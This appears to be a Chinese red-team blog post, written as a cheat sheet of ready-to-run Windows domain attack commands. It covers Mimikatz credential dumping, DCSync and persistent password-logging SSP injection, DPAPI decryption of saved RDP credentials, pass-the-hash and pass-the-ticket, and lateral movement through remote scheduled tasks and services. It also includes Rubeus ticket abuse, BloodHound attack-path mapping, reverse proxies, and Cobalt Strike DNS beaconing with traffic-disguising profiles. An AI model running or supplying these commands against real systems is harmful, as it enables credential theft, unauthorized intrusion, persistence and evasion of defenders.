HW工具

发表于 | 分类于

工具

Mimikatz

开源密码抓取工具

抓密码,hash传递

https://github.com/gentilkiwi/mimikatz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#手动
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /domain:pentestlab.local /all /csv  全域
#一句话
mimikatz.exe pass
#通过注册表开启Windows明文密码记录(2012及以上默认抓不到明文密码)
mimikatz.exe reg
#内存注入实现明文记录到文本,需再次登录,重启无效(有蓝屏风险)
privilege::debug
misc::memssp
type C:\Windows\system32\mimilsa.log
#dll+注册表,永久性密码记录到文本,
copy mimilib.dll %systemroot%\system32
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
type C:\Windows\system32\kiwissp.log

#获取winodws保存的本地rdp凭证
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
privilege::debug
dpapi::cred /in:C:\Users\kering\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
sekurlsa::dpapi
dpapi::cred /in:C:\Users\kering\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:6ccd15632f9354e9fa30a2656bbf193985aa4568876fc9e4b35d72159b79f3d312c4a5b5327272b0328d833aadba7f4d156a976286588ab4bf58f85dbb73e4fe

#传递
sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /ntlm:xxxxxxxxxxxx  #hash传递
sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /aes256:xxxxxxxxxxxxxx  #key传递
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
kerberos::ptt [0;862bdd]-2-0-60a10000-DM2012$@krbtgt-TEST.LOCAL.kirbi
#凭据
kerberos::purge  //清空当前机器所有凭证
Kerberos::list //查看当前机器凭证
kerberos::ptc TGT_admin@cgn.com.ccache //将票据注入到进程中

avatar

mimikatz ptt + net use + schtasks 横向

1
2
3
4
5
6
7
8
9
10
11
12
传递
sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /ntlm:xxxxxxxxxxxx  #hash传递
挂载
net use \\192.168.14.131\C$
测试文件传输
copy 1.txt \\192.168.14.131\C$
创建计划任务or服务修改or服务创建
schtasks /S \\192.168.14.131\ /create /RU SYSTEM /RL HIGHEST /F /tn "SysDebug" /tr "C:\windows\SysDebug.exe" /sc DAILY /mo 1 /ST 11:05
sc \\test-win7t config a2 binpath= "c:\cqooc.exe" start= auto
sc \\test-win7t create a2 binpath= "c:\calc.exe" start= auto
密码转hash
Rubeus.exe hash /user:evilsystem /password:evil /domain:test.local

avatar

avatar

avatar

avatar

Hash rdp

如果目标使用“受限管理模式”,即可通过hash远程桌面(默认关闭)。

可以通过注册表开启。

1
2
3
4
5
6
7
8
9
10
11
12
13
利用hash注入凭据到mstsc程序。默认情况会登录失败
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
以目标凭据启动powershell
mimikatz.exe "sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:powershell.exe"
获取目标powershell(需要开启winrm服务(服务器默认开启),且凭据用户拥有目标管理员权限)target值应为目标主机名
Enter-PSSession -Computer <Target>
winrm quickconfig -q
sc start winrm
这里也可能视为手动winrm横向,流量无法通过代理,cs的横向payload见杀软就没了,这样反而更加有效
修改注册表开启受限管理员模式
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

avatar

ServerScan

开源单文件端口扫描器(跨平台)

命令行扫描,取title,支持tcp,icmp协议,默认线程1500(轻量版无法改线程),专业版手动调整到 1-3000(专业版命令行参数更多,轻量版就够了)

有CS插件,可与CS联动,自动将扫描结果添加到CS的目标中。

https://github.com/Adminisme/ServerScan

1
2
3
4
轻量版
ServerScan_air.exe 192.168.1.0/24 1-1024,8080,8443 tcp
专业版
ServerScan_pro.exe -h 192.168.1.0/24 -p 1-1024,8080,8443 -t 3000 -o result.txt

Seatbelt

https://github.com/GhostPack/Seatbelt

主机信息收集工具

当前正在执行的命令,最近修改访问过的文件,进程,netstat,杀软,环境变量,服务,网络设置,dns缓存,系统信息, 浏览器历史记录,安装的程序,保存的rdp凭证…..好多东西。

1
Seatbelt.exe -group=all

PsExec64

横向,明文(不能用hash)

1
PsExec64.exe \\192.168.1.14 -u test -p test -s cmd

Rubeus

票据操控工具,只能域环境使用

https://github.com/GhostPack/Rubeus

1
2
3
4
5
6
7
8
9
10
11
12
请求票据
Rubeus.exe asktgt /user:harmj0y /rc4:2b576acbe6bcfda7294d6bd18041b8fe
提取票据
Rubeus.exe tgtdeleg
使用票据修改密码
Rubeus.exe changepw /ticket:test.kirbi /new:password@123
密码转hash
Rubeus.exe hash /user:evilsystem /password:evil /domain:test.local
每隔一秒监听一次来自DNS的登陆(需要本地管理员权限)
Rubeus.exe monitor /interval:1 /filteruser:DNS$
哈希传递
Rubeus.exe ptt /ticket:base64

img

AdExplorer

域成员查询

可以即时查询AD数据库,查看域成员的各种信息。

AD Explorer屏幕截图

Bloodhound

域信息收集

通过neo4j数据库可展示域内关系,权限分配,攻击路径

https://github.com/BloodHoundAD/BloodHound

1
Bloodhound.exe -c all --nosavecache --zipfilename domain.zip

avatar

ANGRYPUPPY

自动化工具,CS插件

先得用Bloodhound收集域内信息,然后计算出到目标的路径,导出json文件,导入到ANGRYPUPPY,然后就会自动使用hash传递,一个一个的打过去

https://github.com/vysecurity/ANGRYPUPPY

avatar

MoveKit

NPS

反向代理工具

流量加密,代理不用可以挂起,支持多协议,支持多个代理客户端

https://github.com/ehang-io/nps

avatar

avatar

CHISEL

支持CDN的开源反向代理

使用HTTP协议传输,并通过SSH协议加密。

https://github.com/jpillora/chisel

img

技巧

DNS上线

可以规避流量检测,netstat看不到

域名配置

avatar

监听配置(必须指定53端口)

avatar

验证联通性,最后必须返回解析地址,默认为0.0.0.0

avatar

上线标志,刚开始为沉睡状态,需要执行checkin命令强制唤醒

avatar

avatar

dns网速极慢,正常执行命令还行,如果流量一大,几分钟就过去了。例:密码抓取花费2min。

CS配置文件(流量特征修改)

CS域名前置也是通过CS配置文件实现的,通过配置文件我们可以修改,https证书(自生成),请求报文,返回报文,默认sleep时间,payload,CS进程管道名,等等,很多。

C2concealer:用于生成随机的CS配置文件

https://github.com/FortyNorthSecurity/C2concealer

配置选项

avatar

avatar

流量效果,host为我自定义的GitHub,ip为我转16进制后的结果660712688

avatar

avatar

avatar